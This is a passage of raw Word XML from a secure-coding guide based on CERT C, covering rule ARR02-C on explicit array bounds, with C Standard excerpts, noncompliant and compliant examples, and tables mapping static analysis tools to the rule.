          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000320">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Integer Overflow of Allocation Size</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000321">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Multiplication Overflow of Allocation Size</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000322">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Subtraction Underflow of Allocation Size</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000323">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Addition Overflow of Size</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000324">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unreasonable Size Argument</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000325">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Multiplication Overflow of Size</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000326">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Subtraction Underflow of Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000327">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId52">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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328">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329">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">488 S, 493 S, 493 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032A">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32B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId53">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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32C">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32D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CERT_C-INT08-a</w:t>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Avoid integer overflows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>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331">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3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4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId54">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Explicitly specify array bounds, even if implicitly defined by an initializer</w:t>
              </w:r>
            </w:hyperlink>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35">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Array Initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000336">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[ARR02-C]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000337">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The C Standard allows an array variable to be declared both with a bound and with an initialization literal. The initialization literal also implies an array bound in the number of elements specified.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The size implied by an initialization literal is usually specified by the number of elements,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">int array[] = {1, 2, 3}; /* 3-element array */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">but it is also possible to use designators to initialize array elements in a noncontiguous fashion. Subclause 6.7.9, Example 12, of the C Standard [ISO/IEC 9899:2011] states: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Space can be "allocated" from both ends of an array by using a single designator:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">int a[MAX] = {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">  1, 3, 5, 7, 9, [MAX-5] = 8, 6, 4, 2, 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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41">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In the above, if </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MAX</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> is greater than ten, there will be some zero-valued elements in the middle; if it is less than ten, some of the values provided by the first five initializers will be overridden by the second five.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The C Standard also dictates how array initialization is handled when the number of initialization elements does not equal the explicit array bound. Subclause 6.7.9, paragraphs 21 and 22, state:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000344">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">If there are fewer initializers in a brace-enclosed list than there are elements or members of an aggregate, or fewer characters in a string literal used to initialize an array of known size than there are elements in the array, the remainder of the aggregate shall be initialized implicitly the same as objects that have static storage duration.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000345">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">If an array of unknown size is initialized, its size is determined by the largest indexed element with an explicit initializer. The array type is completed at the end of its initializer list.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Although compilers can compute the size of an array on the basis of its initialization list, explicitly specifying the size of the array provides a redundancy check, ensuring that the array's size is correct. It also enables compilers to emit warnings if the array's size is less than the size implied by the initialization.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Note that this recommendation does not apply (in all cases) to character arrays initialized with string literals. See STR11-C. Do not specify the bound of a character array initialized with a string literal for more information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034A">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C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">This noncompliant code example initializes an array of integers using an initialization with too many elements for the array. The size of the array a is 3, although the size of the initialization is 4. The last element of the initialization (4) is ignored. Most compilers will diagnose this error.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In this example, the compiler allocates an array of four integer elements and, because an array bound is not explicitly specified by the programmer, sets the array bound to 4. However, if the initializer changes, the array bound may also change, causing unexpected results.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E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">First example:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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a[3] = {1, 2, 3, 4};</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000350">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Second example:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035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 = {1, 2, 3, 4};</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000352">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4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">This compliant solution explicitly specifies the array bound:</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(Explicitly specifying the array bound, although it is implicitly defined by an initializer, allows a compiler or other static analysis tool to issue a diagnostic if these values do not agree.)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a[4] = {1, 2, 3, 4};</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000358">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>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5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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035B">
            <w:pPr>
              <w:pBdr>
                <w:top w:space="0" w:sz="0" w:val="nil"/>
                <w:left w:space="0" w:sz="0" w:val="nil"/>
                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
                <w:right w:space="0" w:sz="0" w:val="nil"/>
                <w:between w:space="0" w:sz="0" w:val="nil"/>
              </w:pBdr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">By default, code should be designed so that all arrays are initialized with a pre-defined bound.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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5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5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6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6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6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6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4">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6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66">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67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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6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6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6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6E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId55">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Axivion Bauhaus Suite</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036F">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70">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CertC-ARR02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000371">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372">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId56">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">ECLAIR</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000373">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374">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CC2.ARR02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000375">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376">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId57">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">PC-lint Plus</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000377">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378">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">576</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000379">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Partially supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId58">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">PRQA QA-C</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">9.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0678, 0688, 3674, 3684</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037F">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380">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5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385">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86">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000387">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388">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89">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000038A">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38B">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8C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000038D">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38E">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8F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000390">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391">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92">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6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ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
